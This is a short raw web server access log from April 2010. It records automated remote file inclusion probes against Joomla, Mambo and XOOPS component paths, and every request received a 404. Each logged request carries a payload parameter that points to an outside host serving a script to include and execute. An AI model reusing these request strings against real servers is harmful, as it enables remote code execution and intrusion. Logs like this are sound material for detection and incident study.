78.110.50.121 - - [16/Apr/2010:01:22:35 -0500] "GET /logs//mambots/content/multithumb/slimbox/css///components/com_sef/sef.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:01:22:35 -0500] "GET //mambots/content/multithumb/slimbox/css///components/com_sef/sef.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:01:22:35 -0500] "GET /logs/access_log.1268265600//mambots/content/multithumb/slimbox/css///components/com_sef/sef.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:25:02 -0500] "GET /logs/access_log.1217635200//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 358 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:27:06 -0500] "GET /logs/access_log.1268265600//components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:27:06 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:27:06 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:27:53 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
116.122.36.61 - - [16/Apr/2010:01:27:53 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
